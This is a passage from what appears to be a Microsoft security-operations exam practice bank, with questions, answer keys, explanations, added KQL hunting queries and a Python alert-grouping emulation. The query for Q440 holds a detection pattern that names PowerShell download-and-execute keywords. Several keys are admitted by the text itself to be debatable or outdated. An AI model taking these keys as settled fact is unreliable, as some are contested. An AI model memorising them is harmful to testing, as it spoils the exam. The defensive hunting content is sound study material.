Option D is correct because 'processes' is a built-in live response command that lists the running processes with their PIDs and parents. Option C is wrong because 'netstat' is a Windows tool, not a live response command; the live response equivalent is 'connections'. Option B is wrong for the same reason: 'reg query' is a Windows tool, and live response reads the registry with 'registry'.

Option A is wrong because 'dir' lists the files in a directory. Windows tools can still be reached from live response through 'run' with an uploaded script, but that is not what the question asks.

418
MCQhard

The exhibit shows a KQL query used during incident investigation. The analyst wants to identify devices with an unusually high number of outbound connections to public IPs. The query returns no results, though the analyst suspects there should be some. What is the most likely reason?

A.The timeframe is too short.
B.Data retention for DeviceNetworkEvents is less than 1 day.
C.The field 'RemoteIPType' does not exist in DeviceNetworkEvents.
D.The 'summarize' operator is misused.
AnswerC

The key assumes the filter names a column that is not in the table; check the schema before trusting a column name.

Why this answer

Option C is the key because a filter on a column that does not exist cannot match anything, which fits the symptom of an empty result. Option A is possible but a short window would normally still return a few rows. Option B is wrong because DeviceNetworkEvents is kept for 30 days in advanced hunting and for the workspace retention period in Sentinel, well over a day. Option D is wrong because a misused summarize produces an error or wrong counts, not an empty result.

Two caveats for real work. First, the current advanced hunting schema does carry RemoteIPType in DeviceNetworkEvents (values such as Public, Private, Reserved and Loopback), so classifying by IP range is only needed where that column is missing; confirm with DeviceNetworkEvents | getschema before rewriting a query. Second, a reference to a column that really does not exist fails with a resolution error rather than returning nothing, so a silently empty result is more often a value that never occurs, such as a type name spelt differently from what the table holds.
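The query below is an added example, not the exhibit from the original question, and it shows both classification methods side by side: RemoteIPType where the table has it, and ipv4_is_private() over the raw address where it does not. The thresholds are assumptions to tune against your own baseline.

```kql
// Added example: devices with unusually many outbound connections to public IPs.
// column_ifexists() keeps the query valid on schemas without RemoteIPType;
// ipv4_is_private() covers the RFC 1918 ranges only and returns null for IPv6,
// so IPv6 rows drop out of the fallback path (acceptable for this hunt).
DeviceNetworkEvents
| where TimeGenerated >= ago(24h)
| where ActionType in ("ConnectionSuccess", "ConnectionRequest")
| where isnotempty(RemoteIP)
| extend IpType = column_ifexists("RemoteIPType", "")
| extend IsPublic = iff(isnotempty(IpType), IpType == "Public", not(ipv4_is_private(RemoteIP)))
| where IsPublic
| summarize Connections = count(),
            DistinctRemoteIPs = dcount(RemoteIP),
            DistinctPorts = dcount(RemotePort),
            TopProcesses = make_set(InitiatingProcessFileName, 5)
          by DeviceName, bin(TimeGenerated, 1h)
// assumed thresholds: many distinct public peers in an hour, or a very high connection count
| where DistinctRemoteIPs > 200 or Connections > 2000
| order by DistinctRemoteIPs desc
```

Distinct remote addresses is usually the better signal than raw connection count: a browser or update agent makes thousands of connections to a handful of CDN addresses, while a scanner, a beaconing implant rotating C2 or an exfiltration tool spreads across many. Pair the hour bucket with a comparison against the same device's previous week before raising an incident.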

419
MCQeasy

Your organization uses Microsoft Sentinel and Microsoft Defender XDR. An incident is generated for a user who received a phishing email that bypassed Exchange Online Protection. The user clicked the link and entered credentials on a fake login page. The incident includes alerts from Microsoft Defender for Office 365 and Microsoft Entra ID. You need to respond to the incident. The affected user has administrative privileges. Which of the following should you do FIRST?

A.Reset the user's password and revoke sessions in Microsoft Entra ID.
B.Report the phishing email to Microsoft for analysis.
C.Create a transport rule to block similar phishing emails.
D.Delete the phishing email from the user's mailbox.
AnswerA

Immediately invalidates stolen credentials.

Why this answer

Option A is correct: the attacker already holds the admin's credentials and possibly a session token, so resetting the password and revoking refresh tokens in Microsoft Entra ID is the step that takes both away. Option B is wrong because reporting the message to Microsoft helps other tenants but does nothing for this account. Option D is wrong because deleting the email removes the lure, not the credentials already typed into the fake page.

Option C is wrong because a transport rule is a longer-term hardening step. Because the account is privileged, follow the reset by checking for persistence the attacker may have added before you acted: new MFA methods, OAuth app consents, and mailbox forwarding rules.

420
MCQeasy

Contoso uses Microsoft Sentinel with the Microsoft Defender for Cloud Apps connector. An incident is generated: 'Unusual file download by user - possible data exfiltration.' The incident shows that a user downloaded 500 files from SharePoint Online within 10 minutes, which is abnormal for that user. The user's account shows no other suspicious activity. You need to respond. Which of the following is the BEST first action?

A.Block SharePoint Online access for all users temporarily.
B.Create an anomaly detection policy for such downloads.
C.Suspend the user account in Microsoft Entra ID.
D.Investigate the user's recent activity logs.
AnswerC

Immediately stops the user from accessing any resources.

Why this answer

Option C is correct: suspending the account in Microsoft Entra ID stops further downloads regardless of which client or token the user is holding. Option D is wrong because investigating first leaves the exfiltration running while you read logs. Option A is wrong because blocking SharePoint Online for everyone punishes the whole tenant for one account.

Option B is wrong because an anomaly detection policy is a long-term improvement, not a response to the incident in front of you.

421
MCQmedium

You are a security analyst for a company using Microsoft Defender XDR. An incident is detected involving a device that has been communicating with a known command-and-control (C2) server. The device is currently online and the user is active. What should you do first to contain the threat?

A.Isolate the device from the network using Microsoft Defender for Endpoint
B.Run a full antivirus scan on the device
C.Notify the user to disconnect the device
D.Kill the suspicious processes on the device
AnswerA

Isolation immediately stops C2 communication.

Why this answer

Option A is correct because device isolation in Defender for Endpoint cuts every connection except the Defender channel, so the C2 traffic stops at once while the device stays reachable for live response. Option D is wrong because killing a process does not stop a second implant, a scheduled task or a service from reconnecting. Option B is wrong because a scan is reactive and may not recognise an unknown implant.

Option C is wrong because asking the user to unplug is slower and unreliable, and may tip off an attacker who is watching the session.

422
MCQeasy

Which Microsoft Sentinel feature allows you to automatically respond to incidents by running a playbook when an incident is created?

A.Analytics rules
B.Playbooks
C.Watchlists
D.Workbooks
E.Automation rules
AnswerE

Automation rules can trigger playbooks on incident creation.

Why this answer

Automation rules in Microsoft Sentinel allow you to define automated responses to incidents, including running a playbook when an incident is created. They provide a centralized way to trigger actions based on incident properties such as severity, status, or specific tactics, without needing to embed automation logic directly in analytics rules.

Exam trap

The trap here is that candidates often confuse playbooks with automation rules, thinking playbooks themselves automatically respond to incidents, when in fact playbooks are the action components that must be triggered by an automation rule or manual invocation.

How to eliminate wrong answers

Option A is wrong because analytics rules generate alerts or incidents based on data queries, but they do not directly run playbooks; automation rules are the mechanism that triggers playbooks upon incident creation. Option B is wrong because playbooks are collections of actions (based on Azure Logic Apps) that can be run manually or via automation rules, but they are not the feature that automatically responds to incidents when created. Option C is wrong because watchlists are collections of data (e.g., IP addresses, hostnames) used for correlation and enrichment in analytics rules, not for automated incident response.

Option D is wrong because workbooks are interactive dashboards for visualizing and analyzing data, not for triggering automated responses.

423
Multi-Selecthard

Which TWO actions are valid containment steps for a compromised user account in Microsoft Defender XDR?

Select 2 answers
A.Create a new email rule to forward emails
B.Disable the user account in Microsoft Entra ID
C.Add the user to a privileged role
D.Reset the user's password
E.Run a full antivirus scan on the user's device
AnswersB, D

Containment by disabling.

424
MCQhard

Your organization uses Microsoft Sentinel. An incident is created from a fusion detection that combines multiple signals. You need to ensure that when the incident is resolved, all related alerts are also resolved automatically. What should you do?

A.Create an automation rule triggered when an incident is closed, with the action 'Close alert'
B.Create a playbook triggered on incident creation that closes alerts
C.Create an automation rule triggered when an alert is created
D.Configure the analytics rule to close alerts when the incident is resolved
AnswerA

This resolves all related alerts when the incident is closed.

Why this answer

Option A is correct because an automation rule that fires when an incident is updated to Closed is the only listed mechanism that runs at resolution time, and its action closes the alerts the incident was built from. Option D is wrong because analytics rules create alerts and incidents; they have no hook that runs on incident closure. Option B is wrong because a playbook triggered on incident creation runs at the start of the incident, not at its end.

Option C is wrong because an automation rule on alert creation runs before the incident exists.

425
MCQmedium

During an incident investigation, you discover that an attacker used a legitimate account to access sensitive data in Microsoft Purview Information Protection. You need to identify what data was accessed and by whom. Which log source should you query?

A.Microsoft 365 Defender alerts
B.Microsoft Purview data access logs
C.Microsoft Entra ID sign-in logs
D.Office 365 audit logs (unified audit log)
AnswerB

Purview logs track access to sensitive data, including who accessed what.

Why this answer

Option B is correct in the exam's framing because Purview's audit data is where access to labelled content is recorded with the acting user, the item and the time. Option C is wrong because Entra sign-in logs show authentication to the tenant, not which files were opened. Option D is wrong in the exam's framing because the generic Office 365 audit log is treated as not carrying the Purview access detail.

Option A is wrong because Defender alerts are detections, not per-access records. In practice the two logs are one store: Purview Audit searches the unified audit log, which reaches Sentinel as the OfficeActivity table, so that is where you run the query.

426
Multi-Selecteasy

Which THREE are valid incident severity levels in Microsoft Sentinel?

Select 3 answers
A.Critical
B.Low
C.High
D.Informational
E.Medium
AnswersB, C, E

Low is a valid severity level.

Why this answer

The correct answers are B, C and E. Sentinel's severities are Informational, Low, Medium and High; Critical is not one of them, so the highest an incident can be is High.

Informational (option D) is also a valid severity, so the question as written has four defensible choices; the key takes the three non-informational levels.

427
Multi-Selecthard

Which THREE steps are part of the containment phase of incident response in a hybrid environment using Microsoft Defender XDR?

Select 3 answers
A.Remove malware from affected systems
B.Restore data from backups
C.Disable compromised user accounts in Microsoft Entra ID
D.Isolate affected devices using Microsoft Defender for Endpoint
E.Block malicious IP addresses at the firewall
AnswersC, D, E

Stops further access.

Why this answer

Options C, D and E are correct: isolating devices stops the spread, disabling compromised accounts stops credential misuse, and blocking the attacker's IP addresses at the firewall cuts off the infrastructure they are using. All three limit the damage without yet removing the attacker's tools, which is what containment means.

Option A is wrong because removing malware is eradication. Option B is wrong because restoring from backups is recovery.

428
MCQhard

A SOC analyst is responding to a ransomware incident. The analyst identifies that the ransomware encrypted files on a file share and left a ransom note. The analyst needs to prevent the ransomware from spreading to other shares. Which action should the analyst take first?

A.Revoke the user's access to the file share.
B.Run a full antivirus scan on the server.
C.Restore the encrypted files from backup.
D.Isolate the server from the network using Microsoft Defender for Endpoint's device isolation.
AnswerD

Isolation prevents further communication and spread.

Why this answer

Option D is correct because isolating the server stops it writing to any other share or contacting its operators; do it while the process is still running so volatile evidence survives. Option C is wrong because restoring files before containment simply hands the ransomware fresh data to encrypt. Option B is wrong because a scan may not recognise the sample and does nothing about the network path to other shares.

Option A is wrong because revoking one user's share access does not stop a process that is running on the server under another context.

429
Multi-Selectmedium

Which TWO actions should you take when responding to a confirmed data exfiltration incident involving Microsoft 365? (Choose two.)

Select 2 answers
A.Reset passwords for all users
B.Revoke user sessions in Microsoft Entra ID
C.Review audit logs in Microsoft Purview compliance portal
D.Disable all external sharing in SharePoint
E.Block all access to the tenant
AnswersB, C

Revoking sessions stops ongoing exfiltration.

Why this answer

Option B is correct: revoking the user's sessions invalidates the refresh tokens the attacker is using, which stops the activity in progress. Option C is correct: the Purview audit log (the unified audit log) shows which files were accessed, downloaded or shared and from which IP addresses, which is how you establish scope. Option A is wrong because resetting every user's password is disproportionate.

Option D is wrong because disabling all external sharing is too broad. Option E is wrong because blocking the whole tenant is disruptive and premature. Pair the session revocation with a password reset for the affected account; revocation alone does not stop an attacker signing in again with a password they already have.
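The scoping query that questions 420, 425 and 429 all point at is the same one: pull the user's SharePoint and OneDrive activity out of OfficeActivity and bucket it in time. This is an added example, not part of the original page; the UPN, operations list and threshold are constructed placeholders, and the table assumes the Office 365 connector is enabled.

```kql
// Added example: scope a download burst for one user from the unified audit log.
// OfficeActivity is populated by the Office 365 connector. The UPN and the
// threshold are placeholders; the question's burst was 500 files in 10 minutes.
let suspect = "user@contoso.com";
let window = 24h;
OfficeActivity
| where TimeGenerated >= ago(window)
| where OfficeWorkload in ("SharePoint", "OneDrive")
| where UserId =~ suspect
| where Operation in ("FileDownloaded", "FileSyncDownloadedFull", "FileAccessed", "FileCopied")
| summarize Files = count(),
            DistinctFiles = dcount(OfficeObjectId),
            Sites = make_set(Site_Url, 10),
            ClientIPs = make_set(ClientIP, 10),
            UserAgents = make_set(UserAgent, 5),
            FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated)
          by UserId, Operation, bin(TimeGenerated, 10m)
| where Files >= 100
| order by FirstSeen asc
```

Read the ClientIPs and UserAgents columns before deciding on containment: a single corporate IP with the OneDrive sync client usually means a user re-syncing a library, while an unfamiliar IP with a browser or a scripted user agent behind the same count is the exfiltration case the questions describe. Drop the UserId filter and summarise by UserId alone to find other accounts showing the same pattern in the same window.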

430
Multi-Selecthard

Which THREE are valid data connectors in Microsoft Sentinel for ingesting security events from Microsoft 365 services? (Choose three.)

Select 3 answers
A.Microsoft 365 Defender
B.Microsoft Purview
C.Microsoft Intune
D.Microsoft Entra ID
E.Office 365
AnswersA, D, E

Ingests alerts and incidents from Microsoft Defender XDR.

Why this answer

Options A, D and E are the valid connectors. A: the Microsoft 365 Defender connector (now named Microsoft Defender XDR) ingests incidents and alerts from Defender for Endpoint, Office 365, Identity and Cloud Apps, plus the advanced hunting tables. D: the Microsoft Entra ID connector ingests sign-in and audit logs.

E: the Office 365 connector ingests Exchange, SharePoint/OneDrive and Teams activity into OfficeActivity. Option B is wrong in the exam's framing because Purview is a compliance portal whose audit data arrives through the Office 365 connector; a separate Microsoft Purview Information Protection connector has since been added, so check the current connector gallery. Option C is wrong because Microsoft Intune is a device management service; its audit and operational logs reach a workspace through Intune's own diagnostic settings (the IntuneAuditLogs table), not through a Sentinel connector.

431
MCQmedium

Your organization uses Microsoft Defender for Cloud Apps. You discover that a user has been accessing sensitive data from an anonymous IP address. The user's account appears to be compromised. You need to prevent further data exfiltration. What should you do?

A.Disable the user account in Microsoft Entra ID.
B.Create an IP range policy in Defender for Cloud Apps to block the anonymous IP.
C.Change the user's password and revoke sessions.
D.Suspend the user in Microsoft Defender for Cloud Apps.
AnswerD

Suspending instantly blocks all app access.

Why this answer

Option D is correct in the exam's framing: suspending the user from Defender for Cloud Apps is a governance action that disables the account and revokes its tokens through the Entra ID integration, so all cloud app access stops at once from inside the investigation view. Option C is wrong because a password change on its own leaves existing tokens valid until they are revoked. Option A is wrong only by degree: disabling the account in Entra ID is also effective and is the broader control, but the exam prefers the action taken from the Cloud Apps investigation.

Option B is wrong because anonymous proxy and VPN exit addresses change constantly, so blocking one IP does not stop the attacker.

432
Multi-Selecthard

Which THREE actions are appropriate when investigating a potential data exfiltration incident in Microsoft Defender for Cloud Apps?

Select 3 answers
A.Check the device inventory for suspicious applications
B.Use the app dashboard to view unusual behavior alerts
C.Suspend the user's account immediately
D.Check the file policy matches for the user
E.Review the user's activity log in Defender for Cloud Apps
AnswersB, D, E

Dashboard highlights anomalies.

Why this answer

Options B, D and E are correct. Option E: the user's activity log shows what was downloaded, shared or accessed, from which IP and client, which sets the scope. Option B: the app dashboard and its anomaly alerts (mass download, impossible travel) give context around the event.

Option D: file policy matches show which sensitive files were involved. Option C is wrong because suspending the user is containment, not investigation. Option A is wrong because a device inventory of installed applications is an endpoint view that says nothing about what happened in the cloud app.

433
MCQmedium

Your organization uses Microsoft Sentinel with the Microsoft Defender for Cloud connector enabled. You receive an incident that alerts on 'Suspicious resource deployment' from a user who has been compromised. The incident involves the deployment of a virtual machine in a subscription that is normally not used by that user. The incident severity is High. You need to contain the threat immediately. The deployment is still in progress. What should you do first?

A.Investigate the Azure Activity logs to see what other resources were deployed.
B.Disable the user account in Microsoft Entra ID.
C.Apply a resource lock to the subscription to block all deployments.
D.Delete the virtual machine that is being deployed.
AnswerC

A resource lock prevents any new resource creation, containing the attack.

Why this answer

Option C is correct because a lock on the subscription stops the attacker creating or changing resources from that moment on, including further deployments from the same session. Use a ReadOnly lock; a CanNotDelete lock only blocks deletions and would still allow new deployments. Option A is wrong because reading Activity logs takes time while the deployment carries on. Option D is wrong because deleting the one VM does not stop the next one.

Option B is wrong, in the exam's framing, because disabling the account does not end the deployment already in flight. In practice you do both: lock the scope, then disable the account and revoke its refresh tokens so the attacker cannot simply start again in another subscription.

434
MCQeasy

During an incident investigation, you find that a user's credentials were used to sign in from an unfamiliar location. You want to force a password reset and revoke all sessions immediately. Which action should you take in the Microsoft 365 Defender portal?

A.Disable the user account in Microsoft Entra ID.
B.Block the user's sign-in from the unfamiliar location via Conditional Access.
C.Use the 'Require password reset' action from the user investigation page.
D.Remove the user's MFA registration to force re-registration.
AnswerC

This action forces a password reset and revokes all current sessions.

Why this answer

Option C is correct because 'Require password reset' from the user actions on the user page in the Defender portal forces a reset at next sign-in and revokes the user's current sessions in one step. Option A is wrong because disabling the account blocks sign-in but leaves the credential unchanged. Option B is wrong because a Conditional Access policy takes time to build and does not invalidate sessions that already exist.

Option D is wrong because clearing MFA registration forces re-enrolment, not a password reset.

435
MCQmedium

Your organization uses Microsoft Sentinel. A new incident is created from a fusion alert that combines multiple low-severity alerts. The analyst needs to determine the entities involved. What should the analyst review?

A.The Sentinel Overview workbook.
B.The incident's entities tab.
C.The analytics rule that generated the incident.
D.The incident's timeline.
AnswerB

Entities tab shows all related entities.

Why this answer

Option B is correct because the Entities tab on the incident lists every entity (accounts, hosts, IP addresses, URLs, file hashes) extracted from all the alerts the Fusion engine combined. Option C is wrong because the analytics rule is the source of the detection, not a list of entities. Option A is wrong because the Overview workbook summarises the workspace, not one incident.

Option D is wrong because the timeline shows the sequence of alerts and bookmarks, not the entity set.

436
MCQhard

A security team is investigating a ransomware incident that encrypted files on several Windows servers. Microsoft Defender for Endpoint detected the ransomware but the initial infection vector is unknown. Which KQL query in Microsoft Sentinel would BEST identify the initial process that executed the ransomware?

A.DeviceNetworkEvents | where RemoteUrl contains 'malicious' | project DeviceName, RemoteIP, Timestamp
B.DeviceFileEvents | where FileName contains 'ransomware.exe' | project DeviceName, ActionType, Timestamp
C.DeviceProcessEvents | where FileName contains 'ransomware.exe' | project DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, Timestamp
D.DeviceEvents | where ActionType == 'RansomwareDetection' | project DeviceName, Timestamp
AnswerC

Shows process creation and the parent process that launched it.

Why this answer

Option C is correct because DeviceProcessEvents records each process creation together with the parent that launched it (InitiatingProcessFileName, InitiatingProcessCommandLine) and the grandparent (InitiatingProcessParentFileName), which is the chain you follow back to the initial vector. Option B is wrong because DeviceFileEvents shows file creation and modification, not who started a process. Option A is wrong because DeviceNetworkEvents shows connections, not process ancestry.

Option D is wrong because DeviceEvents holds miscellaneous telemetry, and a detection record on its own does not carry the parent process that matters here.
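Option C gives one hop of ancestry per row. The query below is an added example, not the one from the question, showing how to go further: the first hop is read straight off the row, and the second joins the grandparent's own creation event. The file name is the placeholder from the question and the seven-day window is an assumption.

```kql
// Added example: walk the process ancestry of a detected ransomware binary.
// Hop 1 comes from the row itself; hop 2 joins the grandparent's own creation event.
// PIDs are reused, so the join also matches on the recorded creation time.
let suspect_file = "ransomware.exe";
let hop1 = DeviceProcessEvents
    | where TimeGenerated >= ago(7d)
    | where FileName =~ suspect_file
    | project DeviceId, DeviceName, DetectedAt = TimeGenerated,
              FileName, ProcessCommandLine, SHA256,
              ParentFile = InitiatingProcessFileName,
              ParentCmd = InitiatingProcessCommandLine,
              ParentPid = InitiatingProcessId,
              GrandparentFile = InitiatingProcessParentFileName,
              GrandparentPid = InitiatingProcessParentId,
              GrandparentCreated = InitiatingProcessParentCreationTime;
hop1
| join kind=leftouter (
      DeviceProcessEvents
      | where TimeGenerated >= ago(7d)
      | project DeviceId, ProcessId, ProcessCreationTime,
                GreatGrandparentFile = InitiatingProcessFileName,
                GreatGrandparentCmd = InitiatingProcessCommandLine
  ) on DeviceId,
     $left.GrandparentPid == $right.ProcessId,
     $left.GrandparentCreated == $right.ProcessCreationTime
| project DeviceName, DetectedAt, FileName, SHA256, ProcessCommandLine,
          ParentFile, ParentCmd, GrandparentFile, GreatGrandparentFile, GreatGrandparentCmd
| order by DetectedAt asc
```

Run it with the SHA256 from the alert instead of the file name once you have it; ransomware is routinely renamed, and the hash is what ties the samples on different servers together. A chain that ends in an Office application, a script host (wscript.exe, mshta.exe) or a remote management tool is the initial access you are looking for; a chain that ends in services.exe or a scheduled task points at persistence set up earlier, so push the window back further.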

437
MCQmedium

Contoso uses Microsoft Sentinel with Microsoft Defender XDR connector. You receive an incident titled 'Malware detected on endpoint' from Microsoft Defender for Endpoint. The incident includes a detailed timeline showing that the malware was downloaded from a malicious URL. You need to respond to the incident using Microsoft Sentinel and Microsoft Defender XDR capabilities. The affected device is a Windows 10 workstation used by a standard user. You have been asked to contain the threat and prevent recurrence. The organization has a policy to preserve evidence for 90 days. Which action should you take FIRST?

A.Reset the user's password and revoke sessions in Microsoft Entra ID.
B.Create a custom detection rule in Microsoft Sentinel for the malicious URL.
C.Block the malicious URL at the firewall using Microsoft Defender for Cloud Apps.
D.Isolate the device using Microsoft Defender for Endpoint device isolation.
AnswerD

Stops the malware from communicating and spreading.

Why this answer

Option D is correct: isolating the device stops the malware spreading or reaching its command-and-control, and isolation keeps the disk and memory intact for the 90-day evidence requirement. Option A is wrong because a password reset does nothing to malware on the host. Option B is wrong because a detection rule prevents recurrence but is not immediate.

Option C is wrong because blocking the URL stops the next download but does not contain the device that is already infected; Defender for Cloud Apps is also not a firewall, so a URL block belongs in a Defender for Endpoint custom indicator or the web content filter.

438
MCQmedium

A security analyst uses Microsoft Sentinel to investigate an incident involving data exfiltration from Azure Blob Storage. The analyst needs to determine which user accessed the storage account and from which IP address. Which data source should the analyst query?

A.Azure AD sign-in logs
B.Azure Activity logs
C.Azure Security Center alerts
D.Azure Monitor metrics
AnswerB

Of the listed sources, the Activity log is the one that records who did what to the storage account and from which IP.

Why this answer

Option B is the key because the Azure Activity log records control-plane operations on the storage account (listing access keys, changing network rules, role assignments) with the caller's identity and IP address, and none of the other options records storage access at all. Option A is wrong because Entra sign-in logs only show authentication to the tenant. Option D is wrong because Azure Monitor metrics are aggregated counters with no per-user detail.

Option C is wrong because Azure Security Center (now Defender for Cloud) produces recommendations and alerts, not access records. Be aware that reading or downloading blobs is a data-plane operation and is not in the Activity log; those events exist only if the account's blob diagnostic settings send resource logs (the StorageBlobLogs table) to the workspace, so enable that before an incident rather than during one.
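Where blob resource logs are being collected, the question's real ask (which identity read which blobs, from which address) is answered from StorageBlobLogs rather than AzureActivity. This is an added example, not from the original page; the account name and window are placeholders, and it assumes the StorageRead category of the account's diagnostic setting is routed to the Sentinel workspace.

```kql
// Added example: who read which blobs, from where, using blob resource logs.
// Requires the storage account's blob diagnostic setting (StorageRead at least)
// to be sent to the workspace. Account name and window are placeholders.
let account = "contosofinance";
StorageBlobLogs
| where TimeGenerated >= ago(7d)
| where AccountName =~ account
| where OperationName in ("GetBlob", "ListBlobs", "CopyBlob")
| where StatusCode in (200, 206)
// SAS and account-key requests carry no UPN, so fall back to the object ID
// or the hash of the SAS token that was presented
| extend Principal = iff(isnotempty(RequesterUpn), RequesterUpn,
                         strcat(AuthenticationType, ":", coalesce(RequesterObjectId, AuthenticationHash)))
| summarize Requests = count(),
            Bytes = sum(ResponseBodySize),
            Blobs = dcount(ObjectKey),
            FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated)
          by Principal, AuthenticationType, CallerIpAddress, OperationName
| order by Bytes desc
```

The AuthenticationType column is the first thing to read: OAuth rows tie back to an Entra identity you can disable, while AccountKey and SAS rows mean the attacker holds a secret that survives any account action, and the response is to rotate the key or revoke the stored access policy the SAS was issued under. The Activity log (AzureActivity, filtered to the storage resource provider) then tells you who listed the keys in the first place.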

439
Multi-Selecthard

Which THREE of the following are valid incident management capabilities in Microsoft Sentinel? (Choose three.)

Select 3 answers
A.Assign incidents to analysts or teams
B.Classify incidents as true positive, false positive, or benign positive
C.Merge related incidents into a single incident
D.Create playbooks to automate incident response
E.Create workbooks to visualize incident trends
AnswersA, B, C

Assignment is an incident management capability.

Why this answer

The correct answers are A, B, and C. Incident classification, assignment, and merging are all incident management capabilities. Option D is wrong because playbook creation is not incident management; it's automation.

Option E is wrong because workbook creation is for reporting, not incident management.

440
MCQhard

An analyst runs this advanced hunting query to investigate suspicious command-line activity. Which type of activity is this query most likely detecting?

A.Execution of obfuscated scripts via encoded commands
B.Data exfiltration to external IPs
C.Privilege escalation attempts
D.Port scanning activity
AnswerA

The -enc flag indicates base64-encoded commands used for obfuscation.

Why this answer

Option A is correct because -enc (or any other unambiguous prefix of -EncodedCommand) tells PowerShell to run a base64-encoded UTF-16LE script, which attackers use to hide the command from casual inspection and from simple string matches. Option D is wrong because port scanning shows up as many connection attempts, not as encoded arguments. Option B is wrong because exfiltration is identified from network events and volume, not from encoding.

Option C is wrong because nothing about an encoded command indicates a privilege change by itself; the decoded content might, which is why the next step is to decode it.
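The exhibit is not reproduced on this page, so the query below is an added example rather than the one the question refers to. It finds PowerShell launched with an encoded command, decodes the payload inside the query, and flags the strings and parent processes an analyst would look at first; the keyword list and the seven-day window are assumptions.

```kql
// Added example: find and decode PowerShell -EncodedCommand payloads.
// PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...)
// and the payload is base64 over UTF-16LE text, so the decoded string is full of
// NUL bytes that must be stripped before it can be searched.
DeviceProcessEvents
| where TimeGenerated >= ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe", "powershell_ise.exe")
| extend EncodedBlob = extract(@"(?i)(?:^|\s)[-/]e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", 1, ProcessCommandLine)
| where isnotempty(EncodedBlob)
// base64_decode_tostring returns an empty string on malformed input
| extend Decoded = replace_regex(base64_decode_tostring(EncodedBlob), @"\x00", "")
| extend SuspiciousContent = Decoded matches regex @"(?i)(DownloadString|Invoke-Expression|\bIEX\b|FromBase64String|Net\.WebClient|Invoke-WebRequest|\biwr\b|-nop\b|bypass|hidden)"
| extend OfficeOrScriptParent = InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "outlook.exe",
                                                               "wscript.exe", "cscript.exe", "mshta.exe")
| project TimeGenerated, DeviceName, AccountName, InitiatingProcessFileName,
          InitiatingProcessCommandLine, OfficeOrScriptParent, SuspiciousContent, EncodedBlob, Decoded
| order by TimeGenerated desc
```

Encoded commands are not malicious on their own: configuration management tools and some installers use them routinely, which is why the query keeps the parent process and the decoded text rather than alerting on the flag alone. When the decoded text is itself another base64 blob or a compressed stream, decode the next layer outside the query, for example in PowerShell with [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($blob)).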

441
MCQmedium

Your organization has Microsoft Sentinel deployed in a central Log Analytics workspace. You have a custom analytics rule that detects brute-force attacks against Azure AD by counting failed sign-ins from the same IP address within 5 minutes. The rule currently generates an incident for every 10 failed attempts. During a recent incident, a single IP address generated over 200 failed sign-ins in 10 minutes, resulting in 20 separate incidents. The SOC team is overwhelmed and wants to reduce the number of incidents without lowering the detection threshold. You need to modify the rule to generate only one incident per IP address within a 1-hour window. What should you do?

A.Enable alert suppression in the analytics rule for 1 hour
B.Modify the analytics rule to group alerts by IP address with a 1-hour window
C.Create a new analytics rule that triggers only when failed sign-ins exceed 200 in 5 minutes
D.Create an automation rule that closes duplicate incidents from the same IP
AnswerB

Grouping by IP address consolidates all alerts from the same IP into one incident per hour.

Why this answer

Option B is correct because alert grouping keyed on the IP address entity with a 1-hour window consolidates every alert from that IP fired within the window into a single incident, while the rule's 10-failure threshold is left unchanged. Option A is wrong because suppression stops the rule from running for the chosen period, so it would hide brute-force attempts from every other IP as well, rather than grouping this IP's alerts. Option C is wrong because a rule that fires only at 200 failures in 5 minutes raises the threshold, which is exactly the detection loss the team wants to avoid, and it would still produce multiple incidents over a sustained attack.

Option D is wrong because an automation rule only acts on incidents after they are created; it cannot change how alerts are grouped into incidents.
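As an added example (not part of the original question and not Microsoft's code), the Python below emulates how alert grouping changes the incident count for the scenario above. The alerts are constructed to match it: 20 alerts from one IP in 10 minutes, two from a second IP, and one late alert from the first IP after the window has elapsed. The grouping logic is a simplified model of Sentinel's "group related alerts into incidents" setting with a grouping key and a time window, not the product's implementation; the IP addresses and timestamps are hypothetical.

```python
from datetime import datetime, timedelta
from typing import Callable, Dict, List, Optional

# Constructed alerts (not page data). Each one stands for the rule firing after
# 10 failed sign-ins from the IP entity, exactly as the question's rule behaves.
T0 = datetime(2024, 5, 1, 9, 0, 0)
SAMPLE_ALERTS: List[Dict[str, object]] = (
    # 200 failures in 10 minutes from one IP -> 20 alerts, 30 seconds apart
    [{"time": T0 + timedelta(seconds=30 * i), "ip": "203.0.113.10"} for i in range(20)]
    # a second attacker IP during the same period
    + [{"time": T0 + timedelta(minutes=4), "ip": "198.51.100.7"},
       {"time": T0 + timedelta(minutes=7), "ip": "198.51.100.7"}]
    # the first IP returns after the 1-hour window has elapsed
    + [{"time": T0 + timedelta(minutes=90), "ip": "203.0.113.10"}]
)


def build_incidents(alerts, group_key: Optional[Callable[[Dict], str]], window: timedelta):
    """Simplified model of Sentinel alert grouping (hypothetical, not the product's code).

    With group_key=None every alert opens its own incident (the rule's current
    behaviour). Otherwise an alert joins an existing incident with the same key
    if it fired within `window` of that incident's first alert; if no such
    incident exists, a new one is opened. The alert threshold is untouched."""
    incidents: List[Dict[str, object]] = []
    for alert in sorted(alerts, key=lambda a: a["time"]):
        target = None
        if group_key is not None:
            key = group_key(alert)
            for inc in incidents:
                if inc["key"] == key and alert["time"] - inc["first_seen"] <= window:
                    target = inc
                    break
        if target is None:
            target = {"key": group_key(alert) if group_key else None,
                      "first_seen": alert["time"], "alerts": []}
            incidents.append(target)
        target["alerts"].append(alert)
    return incidents


def summarize(incidents) -> List[tuple]:
    """(grouping key, alert count) per incident, in creation order."""
    return [(inc["key"], len(inc["alerts"])) for inc in incidents]


def ungrouped_count(alerts) -> int:
    """Incident count with no grouping: one incident per alert."""
    return len(build_incidents(alerts, None, timedelta(0)))


def grouped_by_ip(alerts, window_hours: float = 1) -> List[tuple]:
    """Incident summary when alerts are grouped by the IP entity within a window."""
    return summarize(build_incidents(alerts, lambda a: a["ip"], timedelta(hours=window_hours)))


if __name__ == "__main__":
    print("ungrouped incidents:", ungrouped_count(SAMPLE_ALERTS))
    print("grouped by IP, 1h window:", grouped_by_ip(SAMPLE_ALERTS))
```

The late alert from the first IP opens a third incident because it falls outside the window measured from the first alert of the earlier incident; widening the window to two hours folds it back in, which is the trade-off an analyst tunes against how long they want one incident to keep absorbing new alerts.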

442
